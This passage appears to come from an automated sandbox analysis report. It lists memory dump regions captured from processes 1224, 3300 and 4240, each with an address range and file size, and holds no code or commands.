                                                            • memory/1224-74-0x00007FF810D60000-0x00007FF810D83000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-73-0x00007FFFFC270000-0x00007FFFFC5E5000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/1224-66-0x00007FF80C100000-0x00007FF80C12E000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/1224-64-0x00007FF80F2F0000-0x00007FF80F2FD000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/1224-62-0x00007FF810C50000-0x00007FF810C69000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/1224-60-0x00007FF80B9B0000-0x00007FF80BB1F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/1224-58-0x00007FF80C130000-0x00007FF80C153000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-56-0x00007FF813000000-0x00007FF813019000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/1224-272-0x00007FF80C100000-0x00007FF80C12E000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/1224-54-0x00007FF80C210000-0x00007FF80C23D000-memory.dmp

                                                              Filesize

                                                              180KB

                                                            • memory/1224-361-0x00007FF80C0D0000-0x00007FF80C0DD000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/1224-48-0x00007FF814A60000-0x00007FF814A6F000-memory.dmp

                                                              Filesize

                                                              60KB

                                                            • memory/1224-25-0x00007FFFFBBE0000-0x00007FFFFC1CA000-memory.dmp

                                                              Filesize

                                                              5.9MB

                                                            • memory/1224-78-0x00007FF80C210000-0x00007FF80C23D000-memory.dmp

                                                              Filesize

                                                              180KB

                                                            • memory/1224-112-0x00007FF80C130000-0x00007FF80C153000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-280-0x00007FF80BC90000-0x00007FF80BD48000-memory.dmp

                                                              Filesize

                                                              736KB

                                                            • memory/1224-281-0x000001A05C0B0000-0x000001A05C425000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/1224-292-0x00007FFFFC270000-0x00007FFFFC5E5000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/1224-303-0x00007FFFFBBE0000-0x00007FFFFC1CA000-memory.dmp

                                                              Filesize

                                                              5.9MB

                                                            • memory/1224-309-0x00007FF80B9B0000-0x00007FF80BB1F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/1224-304-0x00007FF810D60000-0x00007FF810D83000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-348-0x00007FFFFBBE0000-0x00007FFFFC1CA000-memory.dmp

                                                              Filesize

                                                              5.9MB

                                                            • memory/1224-357-0x00007FF80C100000-0x00007FF80C12E000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/1224-369-0x00007FF80B9B0000-0x00007FF80BB1F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/1224-370-0x000001A05C0B0000-0x000001A05C425000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/1224-368-0x00007FF80C130000-0x00007FF80C153000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-367-0x00007FF813000000-0x00007FF813019000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/1224-366-0x00007FF80C210000-0x00007FF80C23D000-memory.dmp

                                                              Filesize

                                                              180KB

                                                            • memory/1224-365-0x00007FF814A60000-0x00007FF814A6F000-memory.dmp

                                                              Filesize

                                                              60KB

                                                            • memory/1224-364-0x00007FF810D60000-0x00007FF810D83000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-363-0x00007FFFFC270000-0x00007FFFFC5E5000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/1224-358-0x00007FF80BC90000-0x00007FF80BD48000-memory.dmp

                                                              Filesize

                                                              736KB

                                                            • memory/1224-356-0x00007FF80F2F0000-0x00007FF80F2FD000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/1224-355-0x00007FF810C50000-0x00007FF810C69000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/1224-362-0x00007FFFFBAC0000-0x00007FFFFBBDC000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/3300-191-0x000002583D4B0000-0x000002583D4B8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/4240-84-0x000001E9413A0000-0x000001E9413C2000-memory.dmp

                                                              Filesize

                                                              136KB